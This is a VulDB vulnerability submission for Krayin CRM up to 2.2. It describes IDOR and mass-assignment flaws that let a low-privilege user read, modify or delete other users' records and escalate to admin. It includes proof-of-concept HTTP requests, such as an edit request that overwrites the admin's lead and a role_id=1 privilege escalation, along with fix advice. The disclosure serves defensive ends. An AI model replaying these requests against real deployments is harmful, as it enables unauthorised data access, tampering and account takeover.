| Название | Webkul Krayin CRM (krayin/laravel-crm) ≤ 2.2 (latest) CWE-862 (Missing Authorization), CWE-639 (IDOR) |
|---|
| Описание | ???? VulDB Submission — Krayin CRM
Vendor: Webkul
Product: Krayin CRM (krayin/laravel-crm)
Version: ≤ 2.2 (latest)
URL: https://github.com/krayin/laravel-crm
Vulnerability Class: CWE-862 (Missing Authorization), CWE-639 (IDOR)
Risk: High
CVSS 3.1: 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
───
Title: Broken Access Control (IDOR + Mass Assignment) in Krayin CRM ≤ 2.2
Description:
Multiple controllers in Krayin CRM use findOrFail($id) without ownership verification. Any authenticated low-privilege user can:
1. IDOR — Read any record: GET /admin/contacts/persons/view/{id}, GET /admin/leads/view/{id}, GET /admin/settings/users/edit/{id} — returns full data including admin user details, deal values, contact PII.
2. IDOR — Modify/Delete any record: PUT /admin/leads/edit/{id}, DELETE /admin/contacts/persons/{id} — any user can modify or delete other users' records.
3. Mass Assignment — Privilege Escalation: The User model includes role_id and status in $fillable, and update() uses request()->all(). A low-privilege user can escalate to admin by sending role_id=1.
Affected endpoints:
• Persons: view/edit/update/delete (/admin/contacts/persons/*)
• Leads: view/edit/update/delete (/admin/leads/*)
• Quotes: edit/delete (/admin/quotes/*)
• Activities: edit/delete (/admin/activities/*)
• Users: edit (/admin/settings/users/edit/{id})
Affected files:
• packages/Webkul/Admin/src/Http/Controllers/Settings/UserController.php
• packages/Webkul/Admin/src/Http/Controllers/Contact/PersonController.php
• packages/Webkul/Admin/src/Http/Controllers/Lead/LeadController.php
• packages/Webkul/User/src/Models/User.php ($fillable: role_id, status)
───
Proof of Concept:
Environment: Krayin CRM 2.2, PHP 8.3, MySQL 8.0
• Admin user: id=1 ([email protected])
• Low-priv user: id=2 ([email protected])
Test 1 — Read admin user details:
GET /admin/settings/users/edit/1
Cookie: [low_priv_session]
→ HTTP 200 with admin email, role, permissions
Test 2 — Modify admin's lead:
PUT /admin/leads/edit/1
Cookie: [low_priv_session]
Body: title=HACKED&lead_value=0&status=1&lead_pipeline_id=1&lead_pipeline_stage_id=1
→ HTTP 200 — "Leads updated successfully."
→ Admin's "$999,999 deal" changed to "HACKED", value set to 0
Test 3 — Delete other user's contact:
DELETE /admin/contacts/persons/4
Cookie: [low_priv_session]
→ HTTP 200 — "delete-success"
───
Countermeasure:
Add ownership verification in all show/edit/update/destroy methods using bouncer()->getAuthorizedUserIds(). Remove role_id and status from User $fillable. Use $request->validated() instead of request()->all().
Researcher: Nguyen Manh (0xmanhnv) — VulDB ID: 70158 |
|---|
| Источник | ⚠️ https://github.com/krayin/laravel-crm |
|---|
| Пользователь | 0xmanhnv (UID 70158) |
|---|
| Представление | 23.03.2026 05:34 (26 дни назад) |
|---|
| Модерация | 17.04.2026 08:38 (25 days later) |
|---|
| Статус | Дубликат |
|---|
| Запись VulDB | 357338 [Krayin CRM 2.2.x GET PersonController.php эскалация привилегий] |
|---|
| Баллы | 0 |
|---|